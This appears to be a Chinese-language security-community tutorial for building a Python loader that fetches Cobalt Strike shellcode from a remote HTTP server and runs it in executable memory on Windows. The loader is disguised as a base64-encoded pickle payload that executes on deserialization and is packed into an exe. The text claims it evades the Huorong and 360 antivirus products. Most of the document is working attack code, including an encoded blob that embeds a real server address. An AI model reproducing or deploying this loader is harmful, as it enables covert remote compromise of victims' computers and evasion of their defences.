01思路
1、CS生成python x64 shellcode ->payload.py
2、将payload.py中shellcode进行base64编码,放至服务器保存为shellcode_bs64.txt,并开启python http服务
3、编写shellcode.py,向服务器发送请求读取payload.txt,进行序列化并base64编码
4、编写exp.py进行反序列化,加载恶意shellcode
5、打包exe,可过火绒、360
02具体操作
CobaltStrike生成payload
base64编码,放至服务器
服务器开启python http服务
shellcode.py远程加载shellcode_bs64.txt,bs64解码后将shellcode填入加载器,将代码中请求地址改为服务器地址+端口+路径;
将带shellcode的加载器序列化再base64编码输出
import pickle
import base64
shellcode = """
import ctypes,urllib.request,codecs,base64
shellcode = urllib.request.urlopen('http://服务器ip:7777/shellcode_bs64.txt').read() //远程加载shellcode
shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buf,
ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode防止位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""
class A(object):
def __reduce__(self):
return exec, (shellcode,)
ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)
将上一步输出的结果赋值给exp.py中shellcode,将shellcode,base64解码、反序列化、再加载
import base64
import ctypes
import pickle
import urllib.request
shellcode = b'gASVXgQAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFg/BAAACmltcG9ydCBjdHlwZXMsdXJsbGliLnJlcXVlc3QsY29kZWNzLGJhc2U2NApzaGVsbGNvZGUgPSB1cmxsaWIucmVxdWVzdC51cmxvcGVuKCdodHRwOi8vMTIwLjQ4LjcwLjE1NTo3Nzc3L3NoZWxsY29kZV9iczY0LnR4dCcpLnJlYWQoKQpzaGVsbGNvZGUgPSBiYXNlNjQuYjY0ZGVjb2RlKHNoZWxsY29kZSkKc2hlbGxjb2RlID1jb2RlY3MuZXNjYXBlX2RlY29kZShzaGVsbGNvZGUpWzBdCnNoZWxsY29kZSA9IGJ5dGVhcnJheShzaGVsbGNvZGUpCiMg6K6+572uVmlydHVhbEFsbG9j6L+U5Zue57G75Z6L5Li6Y3R5cGVzLmNfdWludDY0CmN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jLnJlc3R5cGUgPSBjdHlwZXMuY191aW50NjQKIyDnlLPor7flhoXlrZgKcHRyID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpLCBjdHlwZXMuY19pbnQoMHgzMDAwKSwgY3R5cGVzLmNfaW50KDB4NDApKQojIOaUvuWFpXNoZWxsY29kZQpidWYgPSAoY3R5cGVzLmNfY2hhciAqIGxlbihzaGVsbGNvZGUpKS5mcm9tX2J1ZmZlcihzaGVsbGNvZGUpCmN0eXBlcy53aW5kbGwua2VybmVsMzIuUnRsTW92ZU1lbW9yeSgKICAgIGN0eXBlcy5jX3VpbnQ2NChwdHIpLCAKICAgIGJ1ZiwgCiAgICBjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpCikKIyDliJvlu7rkuIDkuKrnur/nqIvku45zaGVsbGNvZGXpmLLmraLkvY3nva7pppblnLDlnYDlvIDlp4vmiafooYwKaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoCiAgICBjdHlwZXMuY19pbnQoMCksIAogICAgY3R5cGVzLmNfaW50KDApLCAKICAgIGN0eXBlcy5jX3VpbnQ2NChwdHIpLCAKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMuY19pbnQoMCksIAogICAgY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKQopCiMg562J5b6F5LiK6Z2i5Yib5bu655qE57q/56iL6L+Q6KGM5a6MCmN0eXBlcy53aW5kbGwua2VybmVsMzIuV2FpdEZvclNpbmdsZU9iamVjdChjdHlwZXMuY19pbnQoaGFuZGxlKSxjdHlwZXMuY19pbnQoLTEpKZSFlFKULg=='
pickle.loads(base64.b64decode(shellcode))
运行exp.py 成功上线
最后打包exp.py为exe,火绒,360静态扫描可过
运行exp.exe,火绒,360均未拦截,成功上线
03资源获取
扫码加入小K安全圈,获取最新资源
